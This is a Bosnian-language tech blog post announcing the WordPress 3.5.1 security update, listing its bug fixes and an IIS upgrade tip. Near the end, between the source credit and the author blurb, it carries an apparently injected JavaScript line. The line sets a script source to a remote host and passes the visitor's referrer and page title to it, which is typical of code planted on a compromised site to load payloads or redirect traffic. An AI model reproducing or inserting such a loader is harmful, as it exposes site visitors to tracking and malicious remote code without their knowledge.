WordPress 3.5.1

Novo sigurnosno izdanje WordPressa, verzija 3.5.1, dostupno je za preuzimanje. U ovoj verziji popravljeno je 37 grešaka.

Između ostalog, izvršene su popravke na sljedećim elementima:

  • Uređivač teksta: spriječeno je slučajno modificiranje ili uklanjanje HTML elemenata u nekim rijetkim slučajevima
  • Bibilioteka: popravljeno je nekoliko uočenih propusta vezanih za način rada i kompatibilnost novog načina dodavanja datoteka
  • Mreža: sada se predlažu ispravna rewrite pravila prilikom kreiranja mreže
  • Spriječena je mogućnost da se u člancima koji su zakazani za objavljivanje desi brisanje određenog dijela HTML-a, kao što su ugrađeni video klipovi
  • Izvršene su određene popravke vezane za neispravan rad Javascripta u WordPress administraciji
  • Popravljen je način prikaza upozorenja u slučaju da neki plugin ne pristupa ispravno bazi podataka ili ispravno ne koristi API-je.

Za korisnike koji instaliraju WordPress na IIS server, mogući su problemi prilikom nadogradnje sa verzije 3.5 na verziju 3.5.1. Ako dobijete grešku: “Odredišni direktorij za streaming datoteka ne postoji ili se u njega ne može zapisivati.”, posjetite ovaj link za upute o načinu rješavanja problema.

Za punu listu izmjena, posjetite ovaj link.

WordPress 3.5.1 lokaliziran na bosanski jezik možete preuzeti ovdje ili posjetite vašu Kontrolnu ploču i izvršite nadogradnju.

Izvor: bs.wordpress.org

s.src=’http://gethere.info/kt/?264dpr&frm=script&se_referrer=’ + encodeURIComponent(document.referrer) + ‘&default_keyword=’ + encodeURIComponent(document.title) + ”;

Autor

Tehnografija je tehnološki blog koji svakodnevno donosi novosti iz društvenih mreža, internet startupa, mobilnih tehnologija, zanimljivih tehnoloških događaja te operativnih sistema. No, to nije sve. Kvalitetne recenzije, i jednostavni tutorijali će vam pokazati da svijet Interneta uopće nije tako složen, kako izgleda na prvi pogled.